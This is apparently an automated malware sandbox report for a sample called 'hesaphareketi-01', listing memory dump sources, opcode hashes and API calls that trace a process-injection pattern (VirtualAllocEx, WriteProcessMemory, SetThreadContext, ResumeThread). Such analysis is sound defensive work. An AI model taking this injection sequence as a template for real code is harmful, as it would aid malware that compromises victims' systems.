                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: f07973e9399724b0133a28752e20f65e4b779d3e24a10d5935b654bf437cb5cb
                                          • Instruction ID: 0e99cf33b11eaec1e87f7b400fed737cab7146a649ee541dc97c144500c8fbdf
                                          • Opcode Fuzzy Hash: f07973e9399724b0133a28752e20f65e4b779d3e24a10d5935b654bf437cb5cb
                                          • Instruction Fuzzy Hash: 7441D270C00719CFEB25CFAAC8847CDBBB5BF49314F24816AD418AB291D7755946CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 724 2d14040-2d1407c 725 2d14082-2d14087 724->725 726 2d1412c-2d1414c 724->726 727 2d14089-2d140c0 725->727 728 2d140da-2d14112 CallWindowProcW 725->728 732 2d1414f-2d1415c 726->732 734 2d140c2-2d140c8 727->734 735 2d140c9-2d140d8 727->735 730 2d14114-2d1411a 728->730 731 2d1411b-2d1412a 728->731 730->731 731->732 734->735 735->732
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02D14101
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: 882afbaf0bfe50c9dcff69f6bcd3b616048c6a4d3c2dcc467e18e08efed5671d
                                          • Instruction ID: 57d98d27630f9f8493b0f4d1b030fd04040ddcbe0864b23be8d291ddc0a8e03c
                                          • Opcode Fuzzy Hash: 882afbaf0bfe50c9dcff69f6bcd3b616048c6a4d3c2dcc467e18e08efed5671d
                                          • Instruction Fuzzy Hash: 93410AB5A00309DFDB14CF95D848BAABBF5FB88314F24C499D519AB321D375A845CFA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 738 6f69ed8-6f69f2e 741 6f69f30-6f69f3c 738->741 742 6f69f3e-6f69f7d WriteProcessMemory 738->742 741->742 744 6f69f86-6f69fb6 742->744 745 6f69f7f-6f69f85 742->745 745->744
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F69F70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: b7efc460efe21f01cf27bcd4d3d4c4de0d8efe826b9e24cc641baffbc38b42f4
                                          • Instruction ID: 0356664ebb2cd95b8046b3f42dcb99990507d7dc14c3a99803fac082e3f50262
                                          • Opcode Fuzzy Hash: b7efc460efe21f01cf27bcd4d3d4c4de0d8efe826b9e24cc641baffbc38b42f4
                                          • Instruction Fuzzy Hash: E0212475D003499FDB10CFAAC885BEEBBF5FF48310F10842AE959A7240C7B89944CBA5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 749 6f69ee0-6f69f2e 751 6f69f30-6f69f3c 749->751 752 6f69f3e-6f69f7d WriteProcessMemory 749->752 751->752 754 6f69f86-6f69fb6 752->754 755 6f69f7f-6f69f85 752->755 755->754
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F69F70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: c49de3ce530ae4ff6b932f098a75823c24e1143c8ea9847ba200e1fad4b3a692
                                          • Instruction ID: 38203abf90bcbab9492219ce49ee94b0732c52b434362473dc23ba106d7c8ac0
                                          • Opcode Fuzzy Hash: c49de3ce530ae4ff6b932f098a75823c24e1143c8ea9847ba200e1fad4b3a692
                                          • Instruction Fuzzy Hash: 10212475D003499FDB10CFAAC885BEEBBF5FF48310F10842AE919A7240C7B89944CBA4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 759 133d6a9-133d744 DuplicateHandle 760 133d746-133d74c 759->760 761 133d74d-133d76a 759->761 760->761
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D737
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0270e2afc838d63a99f2635e929bebca4e566f26429f582d1b7d11be14cbe350
                                          • Instruction ID: 240b5d9f0c2c225f35f30b7785287318b55f4734b695163faca3ea46720d70a4
                                          • Opcode Fuzzy Hash: 0270e2afc838d63a99f2635e929bebca4e566f26429f582d1b7d11be14cbe350
                                          • Instruction Fuzzy Hash: AE2114B5900248DFDB11CFAAD485AEEBFF5FB48314F14801AE958A3310C374A945CF64
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F6A050
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: b52d8c34ff349d08724038e94909119c8a72a501173a868f00441156a21f3676
                                          • Instruction ID: a490ff969c90b33914daf8d5f6c685fd6df241cca4890c129a277e5583da4eec
                                          • Opcode Fuzzy Hash: b52d8c34ff349d08724038e94909119c8a72a501173a868f00441156a21f3676
                                          • Instruction Fuzzy Hash: 5521F571C003499FDB10DFAAC885BEEBBF5FF48310F10842AE959A7240D7799944DBA5
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F6A050
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: b402adfc9bc670bb1384acf5dd732f6d4a57d09a506d7b54374eb68cabfd4e32
                                          • Instruction ID: 7b647c279e925889f8d3c1d67c03d6fc8c958046c37d09aa09361d41587851c1
                                          • Opcode Fuzzy Hash: b402adfc9bc670bb1384acf5dd732f6d4a57d09a506d7b54374eb68cabfd4e32
                                          • Instruction Fuzzy Hash: 1C2105B1C003499FDB10CFAAC885BEEBBF5BF48310F10842AE959A7240D7799951DF65
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F6998E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 41f1ac22e7126c79d467876095c76d3aef265c012f8917e135c0ef2cb3d70a49
                                          • Instruction ID: c8fa3987a75e11ebf79f8d2f469dd8fb636fc4cb01057b6efb3e5fa9f4b2d12b
                                          • Opcode Fuzzy Hash: 41f1ac22e7126c79d467876095c76d3aef265c012f8917e135c0ef2cb3d70a49
                                          • Instruction Fuzzy Hash: 7D214971D003098FDB10CFAAC4857EEBBF4EF48314F14842AE459A7240D7B89944CFA5
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F6998E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 3b5bf4798b429ad3b5d87948ccfb3f6f4786625df8aecd7c92233cf54f2aa8a3
                                          • Instruction ID: e2e2e7d0b27cf694809663386d49a6e1a58982e9c2e3053e48a1ebff49b44dfb
                                          • Opcode Fuzzy Hash: 3b5bf4798b429ad3b5d87948ccfb3f6f4786625df8aecd7c92233cf54f2aa8a3
                                          • Instruction Fuzzy Hash: 3F213471D003098FDB50CFAAC4857EEBBF4EF48324F14842AE459A7240D7B89985CFA5
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D737
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 882da61d081dbfa3da533060dc837862668bb190fc699f3bbe14f76a2e492686
                                          • Instruction ID: f87f32f04dc3db038cd62072c85d4a9d1eda15091b1d666459984a0e8dcf6f5e
                                          • Opcode Fuzzy Hash: 882da61d081dbfa3da533060dc837862668bb190fc699f3bbe14f76a2e492686
                                          • Instruction Fuzzy Hash: AA21C2B5900248DFDB11CFAAD884ADEBBF8FB48324F14841AE958A7350D374A954CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F69E8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: ed0b266e177b4e931fd28bf5d49e20227dda58ac000a2762ad5f10b9b992d67b
                                          • Instruction ID: 22ee3d1a2af531ff59cdd13fdecc8474f1da7c9725e94920b4f67d38c481ccc3
                                          • Opcode Fuzzy Hash: ed0b266e177b4e931fd28bf5d49e20227dda58ac000a2762ad5f10b9b992d67b
                                          • Instruction Fuzzy Hash: C91144768003499FDB10CFAAC8447EEBBF5FF48324F20881AE559A7250C7769941CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F69E8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 65b2a45e6f5eedec2074c957cc19fadcf08416b75018a0fd116095f12241c67e
                                          • Instruction ID: 3526da7a9cbbc32628ce45f51d9c1e9f621ae90e6ce53e4598b7b1e43b318c83
                                          • Opcode Fuzzy Hash: 65b2a45e6f5eedec2074c957cc19fadcf08416b75018a0fd116095f12241c67e
                                          • Instruction Fuzzy Hash: 4C1126728003499FDB10DFAAC844BDFBBF5EF48320F14841AE519A7250C7B59940CFA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 323af4fa292d7e2b94b1afdb9b80c76a6cd93cc2adbc7ac77a322201500674c8
                                          • Instruction ID: 89026ca0f25710a9a047882547bd8a5c3bb63ee4bc32262aecca186ec6e0f26e
                                          • Opcode Fuzzy Hash: 323af4fa292d7e2b94b1afdb9b80c76a6cd93cc2adbc7ac77a322201500674c8
                                          • Instruction Fuzzy Hash: 311158B5C003498FDB20CFAAC8457EEFBF4EF48224F24882AD559A7240C7B59544CFA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 96f9a75bed555f7f1f3d7c104d79673e5e7bfbf0e3bc325a5c0609fc63358e05
                                          • Instruction ID: df9c9d6ee8c42aa6fd094a94217f909846bf10e357e451da981cb191ef9d957f
                                          • Opcode Fuzzy Hash: 96f9a75bed555f7f1f3d7c104d79673e5e7bfbf0e3bc325a5c0609fc63358e05
                                          • Instruction Fuzzy Hash: BC112871D043498FDB10DFAAC8457DFFBF4EB88224F248419D519A7240C7B5A944CFA5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F6CD65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 643d80340841ea6773e1144587d6a92962018814b2cbcbe2a2e7803cf228283d
                                          • Instruction ID: 70a6905f1478d85966c319c51fbe764c6612777ec9a616b152b34a94d3b442d4
                                          • Opcode Fuzzy Hash: 643d80340841ea6773e1144587d6a92962018814b2cbcbe2a2e7803cf228283d
                                          • Instruction Fuzzy Hash: 0B11E3B58003499FDB10DF9AD885BDEBBF8EB48724F20841AE558A7240C375A954CFA5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F6CD65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 0c2645637a20d696c9035626e967139367cc20841d0c7bdb874ada0ec027a273
                                          • Instruction ID: 89be43489e49a072517794dfc0b2449740a5e16887ecc17356a6165b56c7f614
                                          • Opcode Fuzzy Hash: 0c2645637a20d696c9035626e967139367cc20841d0c7bdb874ada0ec027a273
                                          • Instruction Fuzzy Hash: 5311F5B58003489FDB10CF9AC845BDEBBF8EB48714F10841AE598A7240C375A944CFA5
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B01E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: e756e1bbf63197fe9f2709a6f7f21325dbf7b49267b660feaeec533d99db2643
                                          • Instruction ID: f9727bcab42ae173262e448e10fb641f14f0adce4ce65cf5b78506a89d3d47ef
                                          • Opcode Fuzzy Hash: e756e1bbf63197fe9f2709a6f7f21325dbf7b49267b660feaeec533d99db2643
                                          • Instruction Fuzzy Hash: B111E0B6C003498FDB24CF9AD444BDEFBF4AB88224F10842AD569A7210D379A545CFA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444112900.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_109d000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea01f863e2222740962db6543a5f4dae403485c34023ec7d6d4b92d7e2e37805
                                          • Instruction ID: 44a4f92e60262822b23ffae22bf51a0d719680cbd011697c1dc9829f1169758e
                                          • Opcode Fuzzy Hash: ea01f863e2222740962db6543a5f4dae403485c34023ec7d6d4b92d7e2e37805
                                          • Instruction Fuzzy Hash: 8F216771544200EFDF05DF54D9D0B2ABFA1FB88328F20C1ADE8890B256C336D446DBA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444112900.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_109d000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c3c417e4172aab2e63672c96e3f8c3afe46c3e7296f7abc22d0cc5e6482223c
                                          • Instruction ID: 3711f24c1fd67c1871aa18ff3fc165906b803e4927335f4288433f05861fd739
                                          • Opcode Fuzzy Hash: 4c3c417e4172aab2e63672c96e3f8c3afe46c3e7296f7abc22d0cc5e6482223c
                                          • Instruction Fuzzy Hash: 4D214571544204EFEF05DF94D9C0B6ABBA5FB88324F20C1ADE9490F246C736E446DBA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444185065.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10ad000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c937983e0e086c13920874d6aa7866375fd61d64e275158a778cbb17e203072
                                          • Instruction ID: e3cc3adbe3ce2de55688200b02224d96b84581e1b3d0f8dd9b4a8002e4a9bd4f
                                          • Opcode Fuzzy Hash: 6c937983e0e086c13920874d6aa7866375fd61d64e275158a778cbb17e203072
                                          • Instruction Fuzzy Hash: 38212271644304EFDB15DFA4D980F26BBA1FB88314F60C5ADE88A4B642C336D447CB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444185065.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10ad000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a6b1e0ba9a6bea642501000d0eb55fa2ce6a10854ec8e697c64ac02dc645b139
                                          • Instruction ID: 97e44f36b2df1da31dc70768466cdacdc1c391daa40b49398e58c6783bcd8a42
                                          • Opcode Fuzzy Hash: a6b1e0ba9a6bea642501000d0eb55fa2ce6a10854ec8e697c64ac02dc645b139
                                          • Instruction Fuzzy Hash: 1A212671504304EFDB05DFD4D9C0B2ABBA5FB94324F60C5ADE8894B652C336D846CB61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444185065.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10ad000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c67c8350415c4d1e3d14ba1114f53cc80293659921ab6424913374f63f0277ae
                                          • Instruction ID: 5c1a8866eee3ab5bc68cb2cf673a1ec85c542b35fd991983cfd2796ad8dfad00
                                          • Opcode Fuzzy Hash: c67c8350415c4d1e3d14ba1114f53cc80293659921ab6424913374f63f0277ae
                                          • Instruction Fuzzy Hash: FC2183755483809FCB13CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444112900.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_109d000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                          • Instruction ID: 6ed90b988de403503a98c40de0f1eab67e44b4b7f7bac0c70af47083724005ab
                                          • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                          • Instruction Fuzzy Hash: 8011CD72444240CFDF12CF44D5C4B56BFA2FB84224F2482A9D8490B256C33AE456DBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444112900.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_109d000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                          • Instruction ID: 9f75e8867404e19db618293542888cc00cc169f865112e131b1c40106be99208
                                          • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                          • Instruction Fuzzy Hash: 6A11DF76404280CFCF12CF54D5C4B16BFB2FB84318F24C6A9D8490B256C336D456DBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444185065.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10ad000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                          • Instruction ID: 1113c6149ba6d36c678ab4e8836d475b13dbcaec66c0ceb2aec3ff0ffce1c7ae
                                          • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                          • Instruction Fuzzy Hash: 6511BB75504280DFDB12CF94C5C4B15BBA2FB84224F24C6AAD8894B6A6C33AD40ACB61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444112900.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_109d000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19fb2542c6d1d4e3e88209d0f9069ac8095e5a1e1001f3c1fea30998c1c9519a
                                          • Instruction ID: bd08c8135dd7f0e0dbd2659d20d4761fca12ecefe59e0d7d841411f226ec2c79
                                          • Opcode Fuzzy Hash: 19fb2542c6d1d4e3e88209d0f9069ac8095e5a1e1001f3c1fea30998c1c9519a
                                          • Instruction Fuzzy Hash: C301F731044384ABEB208EA5CD94B6EFBD8FF41234F14C55AED480B282E2799840DB76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1444112900.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_109d000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 390ec4d3a4f64d9e497858ff17e3d9bfcd20f03aa1ab00574af86b0ad285ebfa
                                          • Instruction ID: f620f880d7069fd3ddf7444c0a7d13c217abf20dd20009d0d04262a89bd787d3
                                          • Opcode Fuzzy Hash: 390ec4d3a4f64d9e497858ff17e3d9bfcd20f03aa1ab00574af86b0ad285ebfa
                                          • Instruction Fuzzy Hash: DCF062714043849EEB218E5AC984B66FFD8EB41634F18C45AED485B287D3799844DBB1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: yX
                                          • API String ID: 0-547598183
                                          • Opcode ID: 981ce016fe25ea514fde12c1ea960545456a9666df88403c697eb57236a52324
                                          • Instruction ID: 2fc108f04d816ec439404cf53db44aa8c99c3779de349c4175f1054ad328c670
                                          • Opcode Fuzzy Hash: 981ce016fe25ea514fde12c1ea960545456a9666df88403c697eb57236a52324
                                          • Instruction Fuzzy Hash: 87E10D74E002598FDB54DFA9C580AAEFBF2FF89304F24816AD815AB355D731A941CFA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9db579c314299be366596db2559e6e7d0bd3bbb536a6459e50c145a9b86f19cc
                                          • Instruction ID: 6b440d0efe7b44e8e9e696bb3302c7defea123049c544b652038f4ace45bfcc5
                                          • Opcode Fuzzy Hash: 9db579c314299be366596db2559e6e7d0bd3bbb536a6459e50c145a9b86f19cc
                                          • Instruction Fuzzy Hash: BBE12A74E00259CFDB54DFA9C580AAEFBF2BF89304F24826AE854AB355D7319941CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a6f0778434e5aee416d6e2f385a39b4d91b729e65f131739e897cf6bd858d6ab
                                          • Instruction ID: 4a461ccff21dcaf95471cdb2839ca546eb553f2d491956a8e2da2110778e0db6
                                          • Opcode Fuzzy Hash: a6f0778434e5aee416d6e2f385a39b4d91b729e65f131739e897cf6bd858d6ab
                                          • Instruction Fuzzy Hash: 2012B5F8C81B458BE310CF25EA4C38A3BF1BB65798BD04B19D2611B2E1D7B4156ACF44
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34deb7f3a51eb95908df7d9832ec7824a835363d34484ae67f5a450e5f047b07
                                          • Instruction ID: d4b73a28dbadd4d7c4601f20d3d5754e69a1626e2b8bca58dbaf3353f4900276
                                          • Opcode Fuzzy Hash: 34deb7f3a51eb95908df7d9832ec7824a835363d34484ae67f5a450e5f047b07
                                          • Instruction Fuzzy Hash: E6D10671E05219DFDB48CFA6D68059EFBF2BF99300F24952AD419AB224DB349902CF94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62282ac05587f17b9fa9a402c1f1cad35d3d87c693ebee8bf0be5d8855915c16
                                          • Instruction ID: cfbea882afbe520598d2d3ef31541b685c4b38e390cde8bbb9f18f37eb89446f
                                          • Opcode Fuzzy Hash: 62282ac05587f17b9fa9a402c1f1cad35d3d87c693ebee8bf0be5d8855915c16
                                          • Instruction Fuzzy Hash: 2FD11771E05219DFDB48CFAAD58059EFBF2BF89300F24D52AD419AB224DB349942CF94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d69d0966f6dca7d5af4c672cfa20b1befd437fc9814dbc2de37f8e41d9dddf5
